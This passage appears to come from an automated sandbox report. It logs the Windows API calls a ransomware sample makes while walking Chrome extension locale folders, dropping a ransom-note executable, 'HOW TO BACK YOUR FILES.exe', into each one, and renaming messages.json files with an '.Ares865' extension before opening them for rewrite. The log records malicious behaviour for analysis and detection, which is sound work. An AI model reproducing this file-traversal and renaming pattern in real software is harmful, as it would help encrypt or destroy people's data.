Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\nl" [0103.788] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\nl" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\nl") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\nl" [0103.788] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0103.788] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\nl\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\nl\\how to back your files.exe"), bFailIfExists=1) returned 0 [0103.788] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0103.789] GetLastError () returned 0x0 [0103.789] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0103.789] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\nl\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x85a8ef50, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x4f15a920, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4f15a920, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccde8 [0103.789] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0103.789] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0103.789] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\nl\\messages.json.Ares865") returned 160 [0103.789] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\nl\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\nl\\messages.json"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\nl\\messages.json.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\nl\\messages.json.ares865"), dwFlags=0x1) returned 1 [0103.791] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\nl\\messages.json.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\nl\\messages.json.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0103.791] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=221) returned 1 [0103.794] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\ms", iMaxLength=260 | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\ms") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\ms" [0103.795] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\ms" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\ms") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\ms" [0103.795] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0103.795] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\ms\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\ms\\how to back your files.exe"), bFailIfExists=1) returned 0 [0103.795] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0103.796] GetLastError () returned 0x0 [0103.796] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0103.796] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\ms\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x85a68df0, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x4f15a920, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4f15a920, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccde8 [0103.796] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0103.796] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0103.796] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\ms\\messages.json.Ares865") returned 160 [0103.796] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\ms\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\ms\\messages.json"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\ms\\messages.json.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\ms\\messages.json.ares865"), dwFlags=0x1) returned 1 [0103.799] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\ms\\messages.json.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\ms\\messages.json.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0103.800] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=210) returned 1 [0103.805] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\lv", iMaxLength=260 | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\lv") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\lv" [0103.805] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\lv" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\lv") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\lv" [0103.805] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0103.805] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\lv\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\lv\\how to back your files.exe"), bFailIfExists=1) returned 0 [0103.806] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0103.806] GetLastError () returned 0x0 [0103.806] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0103.806] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\lv\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x85a68df0, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x4f15a920, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4f15a920, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccde8 [0103.807] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0103.807] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0103.807] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\lv\\messages.json.Ares865") returned 160 [0103.807] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\lv\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\lv\\messages.json"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\lv\\messages.json.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\lv\\messages.json.ares865"), dwFlags=0x1) returned 1 [0103.808] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\lv\\messages.json.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\lv\\messages.json.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0103.809] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=233) returned 1 [0103.812] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\lt", iMaxLength=260 | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\lt") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\lt" [0103.812] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\lt" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\lt") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\lt" [0103.813] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0103.813] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\lt\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\lt\\how to back your files.exe"), bFailIfExists=1) returned 0 [0103.813] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0103.814] GetLastError () returned 0x0 [0103.814] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0103.814] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\lt\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x85a68df0, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x4f15a920, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4f15a920, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccde8 [0103.814] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0103.814] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0103.814] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\lt\\messages.json.Ares865") returned 160 [0103.814] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\lt\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\lt\\messages.json"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\lt\\messages.json.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\lt\\messages.json.ares865"), dwFlags=0x1) returned 1 [0103.815] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\lt\\messages.json.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\lt\\messages.json.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0103.816] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=228) returned 1 [0103.819] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\ko", iMaxLength=260 | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\ko") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\ko" [0103.819] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\ko" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\ko") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\ko" [0103.819] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0103.819] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\ko\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\ko\\how to back your files.exe"), bFailIfExists=1) returned 0 [0103.820] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0103.820] GetLastError () returned 0x0 [0103.820] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0103.820] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\ko\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x85a42c90, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x4f15a920, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4f15a920, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccde8 [0103.820] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0103.820] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0103.821] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\ko\\messages.json.Ares865") returned 160 [0103.821] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\ko\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\ko\\messages.json"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\ko\\messages.json.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\ko\\messages.json.ares865"), dwFlags=0x1) returned 1 [0103.822] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\ko\\messages.json.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\ko\\messages.json.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0103.823] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=230) returned 1 [0103.826] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\ja", iMaxLength=260 | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\ja") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\ja" [0103.826] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\ja" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\ja") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\ja" [0103.826] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0103.826] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: 